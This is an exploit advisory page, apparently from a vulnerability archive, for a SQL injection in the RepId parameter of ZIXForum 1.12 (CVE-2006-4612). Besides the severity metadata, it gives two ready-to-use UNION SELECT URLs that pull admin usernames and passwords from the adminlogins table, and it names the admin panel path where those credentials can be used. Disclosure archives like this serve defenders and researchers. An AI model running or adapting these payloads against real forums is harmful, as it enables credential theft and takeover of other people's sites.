Bug: ©ZIXForum 1.12 <= "RepId" Remote SQL Injection ( Ascii Version )

Search:
WLB2

©ZIXForum 1.12 <= "RepId" Remote SQL Injection

Published
Credit
Risk
2006.09.08
ChironeX FleckeriX Gmail Com
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2006-4612
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

########################################################################
########

## ##

## &copy;ZIXForum 1.12 <= "RepId" Remote SQL Injection ##

## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##

## Credit by | Chironex Fleckeri ##

## Mail | ChironeX.FleckeriX (at) Gmail (dot) Com [email concealed] ##

## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##

## ##

########################################################################
########

########################################################################
########################################################################
##########

#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT
null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #

########################################################################
########################################################################
##########

########################################################################
########################################################################
##########

#Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT
null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #

########################################################################
########################################################################
##########

################################################################

#Admin Panel : http://www.target.com/path/theadmin/default.asp #

################################################################

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version